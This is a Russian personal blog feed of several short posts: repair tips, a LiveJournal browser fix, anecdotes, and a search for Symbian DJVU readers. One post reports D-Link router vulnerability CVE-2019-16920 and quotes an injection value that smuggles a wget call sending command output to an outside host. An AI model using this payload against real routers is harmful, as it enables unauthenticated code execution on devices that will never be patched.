Category: техника

фига

Уязвимость в массовых роутерах D-Link нескольких моделей. Исправлять не будут.

В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".

Наличие уязвимости официально подтверждено в моделях:

  • DIR-655 с прошивкой 3.02b05 или старее;
  • DIR-866L с прошивкой 1.03b04 или старее;
  • DIR-1565 с прошивкой 1.01 или старее;
  • DIR-652 (данных о версиях проблемных прошивок не приводится)
Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.

Отсюда
по этому материалу

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Ну вот скажите, это мне пора сдаваться в дурку, или мирозданию в целом? :)

На экране в браусере открыт вконтактик - единственное место, где у меня системно выключен блокиратор рекламы, ибо глючит интерфейс и логин при включенном.

В процессе возни на кухне пришло в голову перекрутить шуруп один на кухне с места на место чтобы кастрюли висели лучше. Взял шуруповёрт. Перекрутил.


Запнулся в прихожей за кроссовки младшего ребёнка. Переставил их. При возвращении к компу вижу:


И при мелькнувшей отчётливой мысли об уборке через 17 минут реклама плавно замещается вот такой:


Сабж.

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

ветка

Мамы и дети. Прогулка без гаджетов, просто так.

1. Идут навстреча мама с дочкой. У мамы на футболке надпись "DON'T WORRY", у дочки - "be happy".
2. Автомобильная дорога, пешеходный переход. Взрослая кошка и котёнок. Кошка ЯВНО УЧИТ котёнка пересекать автомобильную дорогу, в том числе "вместе с людьми".

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Бездна голодных гаджетов (БГГ) и советы мастеру...

Из опыта починки механических устройств:

Сантехнический лён как армировка в эпоксидку

Он, мало того, то прочный - он цеплючий. :)

последовательность починки головки гитарного колка:

  1. зачистил поверхность штырька
  2. капнул эпоксидкой на него
  3. несколькими волокнами начал обматывать
  4. часть льна обмакнул в эпоксидку и как следует пропитал ею
  5. намотал плотно
  6. остатки эпоксидки слил в формочку из непрочного материала
  7. засунул в эту формочку сверху намотанное со штырьком
  8. оставил на сутки застывать
  9. после застывания раскурочил формочку и напильником опилил лишнее
Cамое сложное в этом всём - не капнуть мимо и не извазюкаться. Для меня, по крайней мере. :)

И чтобы два раза не вставать...

Бездна голодных гаджетов (БГГ)

Звонит клиентка. Починить ноутбук, "Так как он не включается!".
  1. Оказывается, она потеряла от него зарядку
  2. При попытке уточнить марку ноутбука:
    • ну тут две буквы Д и У"
    • Русские буквы или латинские?"
    • Латинские! Точно латинские. - тут я лихорадочно пытаюсь понять, что это за du
    • А если перевернуть ноутбук?
    • А. Ой, да, я его перевёрнутым держу. Это hp в кружочке!

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Задолбало, что в жж крутится и крутится индикатор загрузки... Исправление.

Счёл полезным для многих моих френдов. Взято тут.
Последние две-три недели все страницы ЖЖ начали неприятно себя вести в браузере Firefox: значок загрузки крутится бесконечно, пока не остановишь его кнопкой Esc. При этом все страницы грузятся полностью и работают исправно, только вот этот значок загрузки создаёт неудобства и вообще раздражает.

Решается так:
1. Если стоит NoScript - разрешить в NoScript домен adfox.ru
2. Добавить в AdBlock разрешающее исключение @@||adfox.ru^$domain=livejournal.com
3. В файле C:\Windows\System32\drivers\etc\hosts добавить строку 127.0.0.1 adfox.ru

Смысл действий в том, что на анализе адфоксовых построений адблок жрёт процессор регекспами.
А тут мы в соответствии с ОЧЕНЬ старым рецептом баним адфокс через файл hosts, а адблоку говорим не анализировать эту фигню.
фига

DJVU читалок под симбиан (Nokia E61) нету.

Озадачился чтением книжек на Нокии E61.
Обнаружил, что довольно много есть DJVU книжек, которые было бы интересно почитать.

Попробовал найти читалку для DJVU под Симбиан...

http://4mphone.ru/nokia/51-pdf-djvu-reader-for-symbian-9x-92-93-94-chitalka-pdf-djvu-dlya-symbian-9x-92-93-94.html - Update Error в процессе установки Alternate Reader'a
http://trashbox.ru/link/djvu-reader-symbian - попадающийся в разных местах SymDJVU ставится, но молча не стартует.
http://forum.allnokia.ru/viewtopic.php?t=61974 - эта версия (для 9.2-9.3) ставится, обязательно с переводом даты на МАЙ 2011 года и с обязательной постановкой PIPS 1.06(0) (вместо уже стоящей 1.07(4), рискнул зубами). Но также молча не стартует, как и SymDJVU

Отвечающим - первые ссылки из результатов поиска:
http://habrahabr.ru/blogs/nokia/57234/ - бесполезна, на исходном сайте нет этой программы. Ошибка 404.
http://djvu-soft.narod.ru/ - все имеющиеся ссылки в сущности никуда не ведут.
http://sourceforge.net/projects/symdjvu/files/ - само за себя говорит.
http://symbian-club.com/files/985_djvu-reader-1.06-.html - скачивается игрушечный троян file62.sis (который скачивается и по многим другим ссылочкам)
http://www.symbianclub.org/symbian_9.2/office/Djvu_Reader_v1.06.html - скачивается 533 байта с сообщением о том, что файла нет.

Устал. :(